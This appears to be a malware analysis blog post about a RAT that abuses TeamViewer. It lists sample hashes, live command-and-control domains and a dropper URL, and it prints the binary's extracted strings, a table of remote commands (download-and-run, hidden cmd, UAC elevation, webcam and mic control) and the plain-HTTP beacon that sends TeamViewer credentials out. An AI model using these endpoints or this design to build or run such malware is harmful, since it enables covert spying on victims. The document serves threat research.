[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 GET -> rpc2.gdn/start/includes/tasks.php?hwid=71D7D653-460A-8BE7-264F6AF5
[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 POST -> rpc2.gdn/start/inc.php/start/inc.php
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e GET -> rpc2.gdn/start/includes/tasks.php?hwid=49C78CBD-165E-D0CF-474D92B
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e POST -> rpc2.gdn/start/inc.php/start/inc.php
This is a "rat" (I don't know the name) that uses TeamViewer for spying on victims.
Panel overview
Let's start with a usual panel overview. The interface is very simple, main page (click to enlarge):
Now look at the interesting part: the binary.
TeamViewer_Test_Pub
The sample came from email with an attachment named probably "invoice.js" (e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6) that drops the RAT viastore4caroption-support.info/KKK.exe (0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e)
The sample is a big package used to deploy TeamViewer and the RAT in %APPDATA\WebNet\ as hidden files:
- Entrypoint
- IsDestinationReachableA
- IsDestinationReachableW
- isNetworkAlive.
rpc2.gdn
num1.gdn
process call create "%s"
runas
wmic
TV started from Admin!!!
uac
This OS is not supported!!!
\Policies\System
\CurrentVersion
\Windows
\Microsoft
Software
%s%s%s%s%s
EnableLUA
Off
High (Always Notify)
Medium (Default Notification)
Low (Default Notification)
N/A
error args
Request successfully!!!
cmdshow
cmd
COMSPEC
/C
run error
wait...
error
closed. exitcode: %d (%s)
tasklist
(x64)
(Win32)
%s PID:%d%s
plugin_start
tiff
plugin_del
%s\%s.%s
admin
Yes
UAC LVL: %s
Elevated: %s
RunAsAdmin: %s
AdminGroup: %s
webcam
mic
device is missing
device is available
off
*.tiff
Command not found!!!
Error
%s%s%s
%06lX-%04lX-%04lX-%06lX
%s%s
HTTP/1.0
Windows Server 2016
Windows 10
Windows Server 2012 R2
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Windows XP x64
Windows Server 2003
Windows XP
Windows 2000
unknown
TeamViewer
/start/includes/tasks.php?hwid=
hwid=%s
Content-Type: application/x-www-form-urlencoded
start/includes/act_user.php
hwid=%s&tv_id=%s&tv_pass=%s
start/includes/pass_tv.php
uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%sµ=%s
start/inc.php
\start
.exe
open
IsDestinationReachableA
SensApi.dll
IsDestinationReachableW
IsNetworkAlive
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
TeamViewer_Desktop.exe
Windows Core Services
%s\%s
.log
.txt
.tmp
resource DLL
TeamViewer
TV_Marker
TVWidget
ATL:00BDE7D8
ATL:00BE38B8
This binary seems very verbose with some recurrent patterns like "!!!".
I don't think it's common for skid to deal with TeamViewer so before reversing let's have a look on Google if the dev hasn't copy paste some functions from stackoverflow.
By searching strings like "High (Always Notify)" I've found some matching source code from a curious Github account:
Commands
After looking deeper in this github account and in the RAT, it look like the RAT is a fork, or an update of the source code in the github account. We can found a lot for similar functions: (click to enlarge)
| Github | IDA | Details |
| setinterval | Set new interval for CNC ping | |
| setserver | Set new CNC | |
| setpass | Set new crypt config password | |
| kill | Kill TeamViewer | |
| runexe | Download and run exes | |
| deldll | Delete dll | |
| update | Update | |
| rundll | Download and run dlls | |
| reboot | Restart PC | |
| poweroff | Shut down PC | |
| restart | Restart Process | |
| terminate | Kill process | |
| mydir | Return current dir | |
| admin | admin | Is process admin ? |
| tasklist | tasklist | Send tasks list |
| cmdwnd | cmdwnd | Run hidden cmd |
| cmd | cmd | Run cmd |
| uac | Re-run itself elevated via wmic process call create | |
| plugin_start | Download, copy as .tiff and run an exe | |
| plugin_del | Delete a file | |
| webcam | Webcam on/off | |
| mic | Mic on/off |
CNC communication
The in the wild rat seems to have a different way to communicate with CNC. It communicate over HTTP in plain text (The github version used obfuscated HTTP requests)./includes/tasks.php - GET hwid=%s/includes/act_user.php - POST hwid=%s&tv_id=%s&tv_pass=%s/includes/inc.php - POST uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%s&mic=%s
Notes
The Teamviewer part and the global architecture of the code are the same but that "in the wild" version looks like an updated light version. This is a very basic malware but it work and it's very easy to use. The Readme.md of the github version mention a forum post:http://ander-pub.cc/forum/threads/isxodniki-skrytogo-teamviewer.73/ that is actually down. If someone here has more information about this forum I'm very curious :)
Victims overview
In this campaign, crooks are targeting small company in different country (CN, AU, US, RU...). I've found call centers, accounting etc. Example of call center:
